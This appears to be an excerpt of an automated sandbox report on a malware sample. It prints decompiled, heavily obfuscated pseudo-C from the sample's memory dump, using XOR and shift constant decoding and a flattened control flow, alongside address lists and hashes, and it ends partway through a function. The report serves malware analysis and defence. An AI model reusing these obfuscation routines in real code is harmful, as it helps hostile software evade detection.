                                                                                                                          0x007afd4c
                                                                                                                          0x007afd55
                                                                                                                          0x007afd60
                                                                                                                          0x007afd75
                                                                                                                          0x007afd76
                                                                                                                          0x007afd77
                                                                                                                          0x007afd78
                                                                                                                          0x007afd8a
                                                                                                                          0x007afd9c
                                                                                                                          0x007afda1
                                                                                                                          0x007afda4
                                                                                                                          0x007afd0b
                                                                                                                          0x007afd0b
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x00000000
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x007afcb1
                                                                                                                          0x007afcb9
                                                                                                                          0x007afcdd
                                                                                                                          0x007afce2
                                                                                                                          0x007afcea
                                                                                                                          0x007afcfa
                                                                                                                          0x007afcfb
                                                                                                                          0x007afcfc
                                                                                                                          0x007afcfe
                                                                                                                          0x007afd03
                                                                                                                          0x007afd08
                                                                                                                          0x007afd08
                                                                                                                          0x00000000
                                                                                                                          0x007afcbb
                                                                                                                          0x007afcc1
                                                                                                                          0x00000000
                                                                                                                          0x007afcc7
                                                                                                                          0x007afcc7
                                                                                                                          0x00000000
                                                                                                                          0x007afcc7
                                                                                                                          0x007afcc1
                                                                                                                          0x007affc2
                                                                                                                          0x007affc2
                                                                                                                          0x007affc2
                                                                                                                          0x007afd1b
                                                                                                                          0x007afd2d
                                                                                                                          0x007afd2e
                                                                                                                          0x007afd2f
                                                                                                                          0x007afd34
                                                                                                                          0x007afd3d
                                                                                                                          0x007afd3f
                                                                                                                          0x007afd45
                                                                                                                          0x00000000
                                                                                                                          0x007afd45
                                                                                                                          0x00000000
                                                                                                                          0x007afd3f
                                                                                                                          0x007afde8
                                                                                                                          0x007afdee
                                                                                                                          0x007aff6b
                                                                                                                          0x007aff70
                                                                                                                          0x007aff7e
                                                                                                                          0x007aff8b
                                                                                                                          0x007aff8c
                                                                                                                          0x007aff8d
                                                                                                                          0x007aff8f
                                                                                                                          0x007aff94
                                                                                                                          0x007aff98
                                                                                                                          0x007aff9b
                                                                                                                          0x007affa0
                                                                                                                          0x00000000
                                                                                                                          0x007afdf4
                                                                                                                          0x007afdf4
                                                                                                                          0x007afdfa
                                                                                                                          0x007afede
                                                                                                                          0x007afef5
                                                                                                                          0x007afef7
                                                                                                                          0x007aff00
                                                                                                                          0x007aff02
                                                                                                                          0x007aff04
                                                                                                                          0x007aff06
                                                                                                                          0x007aff0f
                                                                                                                          0x007aff0f
                                                                                                                          0x007aff11
                                                                                                                          0x007aff13
                                                                                                                          0x007aff15
                                                                                                                          0x007aff18
                                                                                                                          0x007aff18
                                                                                                                          0x007aff18
                                                                                                                          0x007aff2a
                                                                                                                          0x007aff2f
                                                                                                                          0x007aff3d
                                                                                                                          0x007aff46
                                                                                                                          0x007aff47
                                                                                                                          0x007aff48
                                                                                                                          0x007aff4a
                                                                                                                          0x007aff4f
                                                                                                                          0x00000000
                                                                                                                          0x007afe00
                                                                                                                          0x007afe00
                                                                                                                          0x007afe06
                                                                                                                          0x007afebe
                                                                                                                          0x007afec3
                                                                                                                          0x007afec7
                                                                                                                          0x007afeca
                                                                                                                          0x007afecf
                                                                                                                          0x00000000
                                                                                                                          0x007afe0c
                                                                                                                          0x007afe0c
                                                                                                                          0x007afe12
                                                                                                                          0x007b0049
                                                                                                                          0x00000000
                                                                                                                          0x007b004f
                                                                                                                          0x007afe18
                                                                                                                          0x007afe1a
                                                                                                                          0x00000000
                                                                                                                          0x007afe20
                                                                                                                          0x007afe20
                                                                                                                          0x007afe2c
                                                                                                                          0x007afe30
                                                                                                                          0x007afe37
                                                                                                                          0x007afe9a
                                                                                                                          0x007afe9d
                                                                                                                          0x007afea2
                                                                                                                          0x007afea5
                                                                                                                          0x00000000
                                                                                                                          0x007afea5
                                                                                                                          0x007afe1a
                                                                                                                          0x007afe06
                                                                                                                          0x007afdfa
                                                                                                                          0x00000000
                                                                                                                          0x007affa5
                                                                                                                          0x007affa5
                                                                                                                          0x007affa5
                                                                                                                          0x007affb1
                                                                                                                          0x00000000
                                                                                                                          0x007affb1

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                          • API String ID: 0-2624470838
                                                                                                                          • Opcode ID: dc5d1e061fe74f9db5568189b74825440e4bb7b1732b24d1fa17ff826067fa35
                                                                                                                          • Instruction ID: 31b0332ed7ab4da5a0a770ee7eb29981495cc7e2f37049b62b8aeec3e25fa38f
                                                                                                                          • Opcode Fuzzy Hash: dc5d1e061fe74f9db5568189b74825440e4bb7b1732b24d1fa17ff826067fa35
                                                                                                                          • Instruction Fuzzy Hash: A7523071509380CFD3B8CF65C58AA8BFBE1BBC5358F10891DE19A96260D7B48949CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079D6D8 Relevance: 9.2, Strings: 7, Instructions: 408COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E0079D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				intOrPtr _t400;
				void* _t407;
				signed int _t410;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				intOrPtr _t434;
				void* _t473;
				intOrPtr* _t482;
				signed int _t485;
				signed int* _t491;
				void* _t493;

				_push(_a16);
				_push(_a12);
				_v16 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E007A20B9(__edx);
				_v72 = 0xfd05e7;
				_t491 =  &(( &_v192)[6]);
				_v72 = _v72 | 0xfdc7c414;
				_v72 = _v72 ^ 0xfdffc5f6;
				_t489 = 0;
				_v128 = 0x159cf;
				_t421 = 0;
				_v128 = _v128 + 0x2543;
				_t485 = 0x8939926;
				_v128 = _v128 ^ 0xc1c453fb;
				_v128 = _v128 ^ 0xc1c52ce8;
				_v188 = 0xc0a375;
				_t423 = 0x5a;
				_v188 = _v188 / _t423;
				_v188 = _v188 + 0xf5e3;
				_v188 = _v188 + 0xffffba7d;
				_v188 = _v188 ^ 0x0002d452;
				_v192 = 0xeb0e91;
				_v192 = _v192 << 0xb;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 | 0x4be38997;
				_v192 = _v192 ^ 0x4be25280;
				_v52 = 0x3397e5;
				_v52 = _v52 ^ 0x345a01ed;
				_v52 = _v52 ^ 0x346a35aa;
				_v60 = 0x140ff9;
				_t424 = 6;
				_v60 = _v60 / _t424;
				_v60 = _v60 ^ 0x000ad59a;
				_v168 = 0x6059cb;
				_t425 = 0x1a;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 / _t425;
				_v168 = _v168 * 0x21;
				_v168 = _v168 ^ 0x3ca5e455;
				_v112 = 0x1e6ccd;
				_v112 = _v112 << 0xc;
				_v112 = _v112 + 0xffff3925;
				_v112 = _v112 ^ 0xe6c2746b;
				_v44 = 0xb8d15a;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x0008fc1e;
				_v172 = 0x2478d;
				_v172 = _v172 ^ 0x68bbc6f8;
				_v172 = _v172 >> 0xc;
				_v172 = _v172 | 0x6f66efc5;
				_v172 = _v172 ^ 0x6f64ef75;
				_v116 = 0x51a99f;
				_v116 = _v116 | 0x1f129b6c;
				_v116 = _v116 ^ 0xc118cdce;
				_v116 = _v116 ^ 0xde47442a;
				_v132 = 0x216e1a;
				_v132 = _v132 + 0xffff43fb;
				_v132 = _v132 ^ 0x7008f7db;
				_v132 = _v132 ^ 0x702542ff;
				_v84 = 0xc91edc;
				_t426 = 0x5e;
				_v84 = _v84 / _t426;
				_v84 = _v84 ^ 0x0006a22a;
				_v164 = 0xa7de11;
				_v164 = _v164 + 0xffff6841;
				_v164 = _v164 >> 4;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x005f8816;
				_v108 = 0xdd6066;
				_v108 = _v108 >> 8;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x00d87344;
				_v92 = 0x21cc88;
				_v92 = _v92 ^ 0xd81b96af;
				_v92 = _v92 ^ 0xd8329727;
				_v96 = 0xbd6d4e;
				_t427 = 0x26;
				_v96 = _v96 / _t427;
				_v96 = _v96 ^ 0x00061825;
				_v24 = 0x6502ac;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x065de4e3;
				_v56 = 0x642336;
				_v56 = _v56 + 0xffffd3db;
				_v56 = _v56 ^ 0x006ffb84;
				_v68 = 0x348f1;
				_t428 = 0x55;
				_v68 = _v68 / _t428;
				_v68 = _v68 ^ 0x0008f449;
				_v76 = 0x3c74f1;
				_v76 = _v76 + 0xffff407e;
				_v76 = _v76 ^ 0x003b6445;
				_v88 = 0xc452b0;
				_v88 = _v88 + 0xffff3a6d;
				_v88 = _v88 ^ 0x00c8dd7a;
				_v48 = 0xc68c2;
				_t429 = 0x57;
				_v48 = _v48 / _t429;
				_v48 = _v48 ^ 0x0008f98a;
				_v100 = 0x631361;
				_v100 = _v100 | 0x5af5ab8e;
				_v100 = _v100 ^ 0x5affcbc5;
				_v148 = 0x1761a;
				_v148 = _v148 ^ 0xebf93349;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0eb625e6;
				_v40 = 0xe5378a;
				_v40 = _v40 >> 2;
				_v40 = _v40 ^ 0x003c8b43;
				_v140 = 0x73545;
				_t430 = 0x61;
				_v140 = _v140 * 0x21;
				_v140 = _v140 / _t430;
				_v140 = _v140 ^ 0x0002b6d6;
				_v80 = 0x39d04;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00009cd0;
				_v156 = 0x1ba0aa;
				_v156 = _v156 + 0x716e;
				_v156 = _v156 << 0xd;
				_v156 = _v156 ^ 0xb6bcbcaf;
				_v156 = _v156 ^ 0x34f57f5f;
				_v20 = 0xda4179;
				_t431 = 0x27;
				_t482 = _v16;
				_v20 = _v20 / _t431;
				_v20 = _v20 ^ 0x00092493;
				_v32 = 0x6dc25;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0008149e;
				_v180 = 0x3ec4dc;
				_v180 = _v180 >> 5;
				_t432 = 0x70;
				_v180 = _v180 / _t432;
				_v180 = _v180 + 0xffff18e8;
				_v180 = _v180 ^ 0xfff4c632;
				_v64 = 0xea19a3;
				_v64 = _v64 | 0xee52e837;
				_v64 = _v64 ^ 0xeef909eb;
				_v28 = 0xcaf9fa;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x000e6f4e;
				_v120 = 0x563e36;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x00027d23;
				_v176 = 0x87c40f;
				_v176 = _v176 ^ 0xb401f56c;
				_v176 = _v176 + 0xffff7429;
				_v176 = _v176 | 0xf3ec0d69;
				_v176 = _v176 ^ 0xf7eb47c6;
				_v184 = 0x47488d;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 << 0xf;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0086c0ad;
				_v136 = 0xb24629;
				_v136 = _v136 | 0x7ef33f67;
				_v136 = _v136 ^ 0x7ef17c1c;
				_v144 = 0xba01aa;
				_v144 = _v144 | 0x3cf3a1ff;
				_v144 = _v144 ^ 0x3cf83085;
				_v124 = 0xbe6d5e;
				_v124 = _v124 + 0xffff96e9;
				_v124 = _v124 | 0xcf3d3218;
				_v124 = _v124 ^ 0xcfb1306a;
				_v36 = 0xa69a94;
				_v36 = _v36 + 0xffffed5e;
				_v36 = _v36 ^ 0x00a0b8ce;
				_v104 = 0xa8033b;
				_t433 = 9;
				_v104 = _v104 / _t433;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x0005e2c3;
				while(1) {
					L1:
					_t434 = _v160;
					while(1) {
						_t400 = _v152;
						while(1) {
							L3:
							_t493 = _t485 - 0xa1723c1;
							if(_t493 > 0) {
								goto L19;
							}
							L4:
							if(_t493 == 0) {
								E007A8519(_v144, _v124, _t489);
								_t485 = 0x4b7559b;
								goto L17;
							} else {
								if(_t485 == 0x4b7559b) {
									return E007A8519(_v36, _v104, _t421);
								}
								if(_t485 == 0x4ed616e) {
									_t441 = _v172;
									_t407 = E007A16AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
									_t491 =  &(_t491[0x12]);
									if(_t407 == 0) {
										L16:
										_t485 = 0xa1723c1;
										L17:
										_t400 = _v152;
									} else {
										_t410 = E007AD25E(_t441);
										_t485 = 0x9a40434;
										_t400 = _v12 * 0x2c + _t421;
										_v152 = _t400;
										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
									}
									_t434 = _v160;
									_t473 = 0x6a50b97;
									continue;
								} else {
									if(_t485 == _t473) {
										E007A2007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
										_t400 = E007A8F9E(_v32, _v180, _v64, _v28, _v160);
										_t491 =  &(_t491[0xb]);
										L30:
										_t473 = 0x6a50b97;
										goto L31;
									} else {
										if(_t485 == 0x8939926) {
											_t485 = 0xe60f9b1;
											continue;
										} else {
											if(_t485 != 0x9a40434) {
												L31:
												if(_t485 != 0x88fb243) {
													goto L1;
												}
											} else {
												_t434 = E007942C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
												_t491 =  &(_t491[5]);
												_v160 = _t434;
												_t473 = 0x6a50b97;
												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
												_t400 = _v152;
												while(1) {
													L3:
													_t493 = _t485 - 0xa1723c1;
													if(_t493 > 0) {
														goto L19;
													}
													goto L4;
												}
												goto L19;
											}
										}
									}
								}
							}
							L34:
							return _t400;
							L19:
							if(_t485 == 0xaf524c8) {
								_push(_t434);
								_push(_t434);
								_t400 = E00797FF2(0x2000);
								_t489 = _t400;
								if(_t400 == 0) {
									_t485 = 0x4b7559b;
									goto L30;
								} else {
									_t485 = 0x4ed616e;
									goto L17;
								}
							} else {
								if(_t485 == 0xb29ddc7) {
									_t482 = _t482 + 0x2c;
									asm("sbb esi, esi");
									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
									continue;
								} else {
									_t400 = 0xd1a593f;
									if(_t485 == 0xd1a593f) {
										E0079DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
										_t491 =  &(_t491[5]);
										goto L16;
									} else {
										if(_t485 != 0xe60f9b1) {
											goto L31;
										} else {
											_push(_t434);
											_push(_t434);
											_t400 = E00797FF2(0x20000);
											_t421 = 0xd1a593f;
											if(0xd1a593f != 0) {
												_t485 = 0xaf524c8;
												goto L17;
											}
										}
									}
								}
							}
							goto L34;
						}
					}
				}
			}









































































                                                                                                                          0x0079d6e2
                                                                                                                          0x0079d6eb
                                                                                                                          0x0079d6f2
                                                                                                                          0x0079d6f9
                                                                                                                          0x0079d700
                                                                                                                          0x0079d707
                                                                                                                          0x0079d709
                                                                                                                          0x0079d70e
                                                                                                                          0x0079d719
                                                                                                                          0x0079d71c
                                                                                                                          0x0079d729
                                                                                                                          0x0079d734
                                                                                                                          0x0079d736
                                                                                                                          0x0079d73e
                                                                                                                          0x0079d740
                                                                                                                          0x0079d748
                                                                                                                          0x0079d74d
                                                                                                                          0x0079d755
                                                                                                                          0x0079d75d
                                                                                                                          0x0079d76b
                                                                                                                          0x0079d770
                                                                                                                          0x0079d776
                                                                                                                          0x0079d77e
                                                                                                                          0x0079d786
                                                                                                                          0x0079d78e
                                                                                                                          0x0079d796
                                                                                                                          0x0079d79b
                                                                                                                          0x0079d7a0
                                                                                                                          0x0079d7a8
                                                                                                                          0x0079d7b0
                                                                                                                          0x0079d7bb
                                                                                                                          0x0079d7c6
                                                                                                                          0x0079d7d1
                                                                                                                          0x0079d7e3
                                                                                                                          0x0079d7e8
                                                                                                                          0x0079d7f1
                                                                                                                          0x0079d7fc
                                                                                                                          0x0079d809
                                                                                                                          0x0079d80a
                                                                                                                          0x0079d814
                                                                                                                          0x0079d81d
                                                                                                                          0x0079d821
                                                                                                                          0x0079d829
                                                                                                                          0x0079d831
                                                                                                                          0x0079d836
                                                                                                                          0x0079d83e
                                                                                                                          0x0079d846
                                                                                                                          0x0079d851
                                                                                                                          0x0079d859
                                                                                                                          0x0079d864
                                                                                                                          0x0079d86c
                                                                                                                          0x0079d874
                                                                                                                          0x0079d879
                                                                                                                          0x0079d881
                                                                                                                          0x0079d889
                                                                                                                          0x0079d891
                                                                                                                          0x0079d899
                                                                                                                          0x0079d8a1
                                                                                                                          0x0079d8a9
                                                                                                                          0x0079d8b1
                                                                                                                          0x0079d8b9
                                                                                                                          0x0079d8c1
                                                                                                                          0x0079d8cb
                                                                                                                          0x0079d8d9
                                                                                                                          0x0079d8de
                                                                                                                          0x0079d8e7
                                                                                                                          0x0079d8f2
                                                                                                                          0x0079d8fa
                                                                                                                          0x0079d902
                                                                                                                          0x0079d907
                                                                                                                          0x0079d90c
                                                                                                                          0x0079d914
                                                                                                                          0x0079d91c
                                                                                                                          0x0079d921
                                                                                                                          0x0079d926
                                                                                                                          0x0079d92e
                                                                                                                          0x0079d936
                                                                                                                          0x0079d93e
                                                                                                                          0x0079d946
                                                                                                                          0x0079d952
                                                                                                                          0x0079d957
                                                                                                                          0x0079d95d
                                                                                                                          0x0079d965
                                                                                                                          0x0079d970
                                                                                                                          0x0079d978
                                                                                                                          0x0079d983
                                                                                                                          0x0079d98e
                                                                                                                          0x0079d999
                                                                                                                          0x0079d9a4
                                                                                                                          0x0079d9b6
                                                                                                                          0x0079d9bb
                                                                                                                          0x0079d9c4
                                                                                                                          0x0079d9cf
                                                                                                                          0x0079d9da
                                                                                                                          0x0079d9e5
                                                                                                                          0x0079d9f0
                                                                                                                          0x0079d9f8
                                                                                                                          0x0079da00
                                                                                                                          0x0079da08
                                                                                                                          0x0079da1a
                                                                                                                          0x0079da1f
                                                                                                                          0x0079da28
                                                                                                                          0x0079da33
                                                                                                                          0x0079da3b
                                                                                                                          0x0079da43
                                                                                                                          0x0079da4b
                                                                                                                          0x0079da53
                                                                                                                          0x0079da5b
                                                                                                                          0x0079da60
                                                                                                                          0x0079da68
                                                                                                                          0x0079da73
                                                                                                                          0x0079da7b
                                                                                                                          0x0079da86
                                                                                                                          0x0079da93
                                                                                                                          0x0079da94
                                                                                                                          0x0079da9e
                                                                                                                          0x0079daa2
                                                                                                                          0x0079daaa
                                                                                                                          0x0079dab5
                                                                                                                          0x0079dabd
                                                                                                                          0x0079dac8
                                                                                                                          0x0079dad0
                                                                                                                          0x0079dada
                                                                                                                          0x0079dadf
                                                                                                                          0x0079dae7
                                                                                                                          0x0079daef
                                                                                                                          0x0079db03
                                                                                                                          0x0079db08
                                                                                                                          0x0079db0f
                                                                                                                          0x0079db16
                                                                                                                          0x0079db21
                                                                                                                          0x0079db2c
                                                                                                                          0x0079db34
                                                                                                                          0x0079db3f
                                                                                                                          0x0079db47
                                                                                                                          0x0079db52
                                                                                                                          0x0079db57
                                                                                                                          0x0079db5b
                                                                                                                          0x0079db63
                                                                                                                          0x0079db6b
                                                                                                                          0x0079db76
                                                                                                                          0x0079db81
                                                                                                                          0x0079db8c
                                                                                                                          0x0079db97
                                                                                                                          0x0079db9f
                                                                                                                          0x0079dbaa
                                                                                                                          0x0079dbb2
                                                                                                                          0x0079dbb7
                                                                                                                          0x0079dbbc
                                                                                                                          0x0079dbc4
                                                                                                                          0x0079dbcc
                                                                                                                          0x0079dbd4
                                                                                                                          0x0079dbdc
                                                                                                                          0x0079dbe4
                                                                                                                          0x0079dbec
                                                                                                                          0x0079dbf4
                                                                                                                          0x0079dbf9
                                                                                                                          0x0079dbfe
                                                                                                                          0x0079dc02
                                                                                                                          0x0079dc0a
                                                                                                                          0x0079dc12
                                                                                                                          0x0079dc1a
                                                                                                                          0x0079dc22
                                                                                                                          0x0079dc2a
                                                                                                                          0x0079dc32
                                                                                                                          0x0079dc3a
                                                                                                                          0x0079dc42
                                                                                                                          0x0079dc4a
                                                                                                                          0x0079dc52
                                                                                                                          0x0079dc5a
                                                                                                                          0x0079dc65
                                                                                                                          0x0079dc70
                                                                                                                          0x0079dc7b
                                                                                                                          0x0079dc89
                                                                                                                          0x0079dc91
                                                                                                                          0x0079dc95
                                                                                                                          0x0079dc9a
                                                                                                                          0x0079dca2
                                                                                                                          0x0079dca2
                                                                                                                          0x0079dca2
                                                                                                                          0x0079dca6
                                                                                                                          0x0079dca6
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dcb0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079dcb6
                                                                                                                          0x0079dcb6
                                                                                                                          0x0079de66
                                                                                                                          0x0079de6c
                                                                                                                          0x00000000
                                                                                                                          0x0079dcbc
                                                                                                                          0x0079dcc2
                                                                                                                          0x00000000
                                                                                                                          0x0079df63
                                                                                                                          0x0079dcce
                                                                                                                          0x0079de01
                                                                                                                          0x0079de05
                                                                                                                          0x0079de0a
                                                                                                                          0x0079de0f
                                                                                                                          0x0079de52
                                                                                                                          0x0079de52
                                                                                                                          0x0079de57
                                                                                                                          0x0079de57
                                                                                                                          0x0079de11
                                                                                                                          0x0079de1f
                                                                                                                          0x0079de27
                                                                                                                          0x0079de39
                                                                                                                          0x0079de3d
                                                                                                                          0x0079de41
                                                                                                                          0x0079de41
                                                                                                                          0x0079de44
                                                                                                                          0x0079de48
                                                                                                                          0x00000000
                                                                                                                          0x0079dcd4
                                                                                                                          0x0079dcd6
                                                                                                                          0x0079dd6a
                                                                                                                          0x0079dd91
                                                                                                                          0x0079dd9b
                                                                                                                          0x0079dda0
                                                                                                                          0x0079df40
                                                                                                                          0x0079df40
                                                                                                                          0x00000000
                                                                                                                          0x0079dcd8
                                                                                                                          0x0079dcde
                                                                                                                          0x0079dd31
                                                                                                                          0x00000000
                                                                                                                          0x0079dce0
                                                                                                                          0x0079dce6
                                                                                                                          0x0079df45
                                                                                                                          0x0079df4b
                                                                                                                          0x00000000
                                                                                                                          0x0079df4d
                                                                                                                          0x0079dcec
                                                                                                                          0x0079dd14
                                                                                                                          0x0079dd16
                                                                                                                          0x0079dd1b
                                                                                                                          0x0079dd24
                                                                                                                          0x0079dd29
                                                                                                                          0x0079dca6
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dcb0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079dcb0
                                                                                                                          0x00000000
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dce6
                                                                                                                          0x0079dcde
                                                                                                                          0x0079dcd6
                                                                                                                          0x0079dcce
                                                                                                                          0x0079df6e
                                                                                                                          0x0079df6e
                                                                                                                          0x0079de73
                                                                                                                          0x0079de79
                                                                                                                          0x0079df22
                                                                                                                          0x0079df23
                                                                                                                          0x0079df24
                                                                                                                          0x0079df29
                                                                                                                          0x0079df2f
                                                                                                                          0x0079df3b
                                                                                                                          0x00000000
                                                                                                                          0x0079df31
                                                                                                                          0x0079df31
                                                                                                                          0x00000000
                                                                                                                          0x0079df31
                                                                                                                          0x0079de7f
                                                                                                                          0x0079de85
                                                                                                                          0x0079def6
                                                                                                                          0x0079defb
                                                                                                                          0x0079df03
                                                                                                                          0x00000000
                                                                                                                          0x0079de87
                                                                                                                          0x0079de87
                                                                                                                          0x0079de8e
                                                                                                                          0x0079dee9
                                                                                                                          0x0079deee
                                                                                                                          0x00000000
                                                                                                                          0x0079de90
                                                                                                                          0x0079de96
                                                                                                                          0x00000000
                                                                                                                          0x0079de9c
                                                                                                                          0x0079deb3
                                                                                                                          0x0079deb4
                                                                                                                          0x0079deb5
                                                                                                                          0x0079deba
                                                                                                                          0x0079dec0
                                                                                                                          0x0079dec6
                                                                                                                          0x00000000
                                                                                                                          0x0079dec6
                                                                                                                          0x0079dec0
                                                                                                                          0x0079de96
                                                                                                                          0x0079de8e
                                                                                                                          0x0079de85
                                                                                                                          0x00000000
                                                                                                                          0x0079de79
                                                                                                                          0x0079dcaa
                                                                                                                          0x0079dca6

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                          • API String ID: 0-652707834
                                                                                                                          • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                          • Instruction ID: ff9a3f1bea870af9086b4b16afb564f611c4d9444754597a267c1269e490fc27
                                                                                                                          • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                          • Instruction Fuzzy Hash: D112307250C3808FD778DF25D88AA9BBBE2BBC5304F108A1DE5D986260D7B58949CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007981B7 Relevance: 9.1, Strings: 7, Instructions: 349COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E007981B7() {
				void* _t347;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t360;
				signed int _t364;
				void* _t374;
				intOrPtr _t407;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int* _t422;
				void* _t426;

				 *(_t426 + 0x74) = 0xd212a7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
				_t374 = 0xebf23c2;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
				 *(_t426 + 0x20) = 0x60274e;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				_t414 = 0x29;
				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
				 *(_t426 + 0x9c) = 0x5f71eb;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
				 *(_t426 + 0x1c) = 0x8735e4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
				 *(_t426 + 0x58) = 0x9ed5c5;
				_t415 = 0x17;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
				 *(_t426 + 0x5c) = 0x8fe0dc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
				 *(_t426 + 0x48) = 0x18253c;
